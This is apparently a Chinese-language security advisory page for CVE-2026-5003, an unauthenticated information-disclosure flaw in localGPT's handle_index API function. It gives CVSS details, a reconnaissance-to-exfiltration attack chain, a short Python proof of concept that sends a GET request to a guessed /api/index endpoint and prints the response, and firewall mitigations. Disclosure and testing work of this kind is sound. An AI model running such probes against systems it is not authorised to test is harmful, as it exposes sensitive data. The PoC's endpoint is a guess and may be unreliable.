CVE-2026-5003 CVSS 5.3 中危

CVE-2026-5003 PromtEngineer localGPT信息泄露漏洞

披露日期: 2026-03-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5003

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PromtEngineer localGPT

漏洞概述

PromtEngineer localGPT 在处理 Web 请求时存在信息泄露漏洞。该漏洞位于 `rag_system/api_server.py` 的 `handle_index` 函数中，由于缺乏适当的访问控制，未经身份验证的远程攻击者可通过操纵特定请求获取敏感信息。目前厂商尚未响应，且产品采用滚动发布模式，受影响范围涵盖特定 commit 及更早版本。

技术细节

该漏洞的核心在于 PromtEngineer localGPT 的 Web 接口组件中，`rag_system/api_server.py` 文件的 `handle_index` 函数未能正确处理用户输入。攻击者无需用户交互（UI:N）和身份认证（PR:N）即可通过网络（AV:N）发起攻击。通过向该端点发送特制的恶意请求，攻击者能够触发信息泄露，读取服务器上的敏感数据。由于产品采用滚动发布机制，版本信息通过 commit ID 标识（如 4d41c7d...），而非传统版本号，这增加了定性和修复的难度。尽管漏洞仅影响机密性（C:L），未影响完整性和可用性，但仍可能导致严重的隐私泄露风险。

攻击链分析

STEP 1

侦察

攻击者扫描网络或端口，发现运行 PromtEngineer localGPT 的目标服务。

STEP 2

漏洞探测

攻击者向 `rag_system/api_server.py` 的 `handle_index` 接口发送特制的 HTTP GET 请求，检查是否返回未经授权的系统信息。

STEP 3

信息获取

由于无需认证且存在逻辑缺陷，服务器响应中包含敏感数据。攻击者解析响应内容，获取泄露的信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: PromtEngineer localGPT Information Disclosure
# Date: 2026-03-28
# Exploit Author: Analyst
# Vendor Homepage: https://github.com/PromtEngineer/localGPT
# Version: up to commit 4d41c7d
# Tested on: Linux/Windows

def check_vulnerability(target_url):
    """Checks if the target is vulnerable to CVE-2026-5003."""
    # The vulnerable endpoint is typically the index handler of the API server
    # Based on the description, no authentication is required.
    endpoint = f"{target_url}/api/index" 
    
    try:
        response = requests.get(endpoint, timeout=10)
        
        if response.status_code == 200:
            print("[+] Potential vulnerability detected!")
            print("[+] Server responded with data:")
            print(response.text)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost:8000"
    check_vulnerability(target)

影响范围

PromtEngineer localGPT <= commit 4d41c7d1713b16b216d8e062e51a5dd88b20b054

防御指南

临时缓解措施

由于厂商尚未发布补丁，建议暂时在防火墙层面限制对 localGPT Web 服务的访问，仅允许本地回环或受信任的内网 IP 访问。开发者应手动修改源代码，移除或保护 `handle_index` 函数中的敏感信息输出。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5003
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5003
3 Details https://www.cvedetails.com/cve/CVE-2026-5003/
4 VulDB https://vuldb.com/cve/CVE-2026-5003
5 Link https://github.com/August829/CVEP/issues/10
6 Link https://vuldb.com/submit/779148
7 Link https://vuldb.com/vuln/353890
8 Link https://vuldb.com/vuln/353890/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表